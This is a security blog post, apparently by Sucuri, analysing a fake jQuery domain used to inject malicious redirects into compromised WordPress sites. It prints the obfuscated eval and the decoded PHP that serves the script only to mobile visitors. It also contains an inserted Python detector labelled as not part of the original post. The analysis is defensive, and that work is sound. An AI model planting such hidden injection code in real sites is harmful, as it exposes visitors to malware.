Careful With Fake jQuery Website – jquery-framework. com

A few days ago we posted in our Labs notes about a fake jQuery website that is distributing malware. The domain was chosen to confuse end users ( ), since it looks like a valid site.

This is what we were seeing injected on some websites:

<script src="httx://

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to

window.location = "httx://";

Which then redirects the browser to additional malicious domains. This is the full path: -> -> ->

or -> -> -> ->

Compromised WordPress sites

Since we initially started seeing this and posted in our Labs, we’re seeing even more websites compromised with it (mostly on outdated WordPress). We had the chance to analyze some of them and they had the following eval code being used to hide the malware (inside the theme files):

eval ("\145\166\141\154\050\142 .. \141\163\145\066\064\137")

Which when decoded executes the following:

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT'].. || preg_match('/alcatel|amoi|android|avantgo|blackberry|..
vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || 
       preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) && 
@$_SERVER['HTTP_USER_AGENT'])) { echo "<script src="httx://"..'; 
exit; }

If you are not familiar with PHP, the code checks whether you are visiting the site from a mobile device (iPod, iPad, iPhone, etc.), and if you are, it inserts the code on the site. Since Google (and other AV blacklists) aren't flagging this domain, users will receive no warning of what is happening.
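One way to look for this kind of hidden eval in theme files, as an added example (not code from the original post or from Sucuri's scanner): it finds eval() calls whose string argument is made up almost entirely of octal or hex escapes and decodes them for review. The function names, the 0.8 threshold and the sample theme file are assumptions made for the illustration.

```python
import re

# PHP double-quoted strings accept \ooo (octal) and \xHH (hex) escapes.
ESCAPE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')
# eval ( "..." ) with a double-quoted literal argument, whitespace-tolerant.
EVAL_CALL = re.compile(r'eval\s*\(\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE)

def decode_php_escapes(literal):
    """Resolve octal/hex escapes the way PHP would, leaving other text alone."""
    def repl(m):
        code = int(m.group(1), 8) if m.group(1) else int(m.group(2), 16)
        return chr(code & 0xFF)
    return ESCAPE.sub(repl, literal)

def escape_ratio(literal):
    """Fraction of the literal's characters that belong to escape sequences."""
    escaped = sum(len(m.group(0)) for m in ESCAPE.finditer(literal))
    return escaped / len(literal) if literal else 0.0

def find_obfuscated_evals(source, threshold=0.8):
    """Return (line_number, decoded_text) for eval() calls on escape-encoded strings."""
    hits = []
    for m in EVAL_CALL.finditer(source):
        literal = m.group(1)
        if escape_ratio(literal) >= threshold:
            line = source.count("\n", 0, m.start()) + 1
            hits.append((line, decode_php_escapes(literal)))
    return hits

# Constructed sample: a theme file with one plain eval and one octal-encoded eval
# (the encoded string decodes to the harmless statement "echo 1;").
SAMPLE_THEME = r'''<?php
get_header();
eval("return 1;");
eval ("\145\143\150\157\40\61\73");
get_footer();
'''

if __name__ == "__main__":
    for line, decoded in find_obfuscated_evals(SAMPLE_THEME):
        print(f"line {line}: eval of encoded string -> {decoded!r}")
```

Any hit deserves a manual look at the decoded text, since legitimate themes rarely pass escape-encoded strings to eval().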

We’re definitely flagging it. Scan your site for free using Sucuri SiteCheck to make sure you’re good to go.

About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site or on Twitter: @danielcid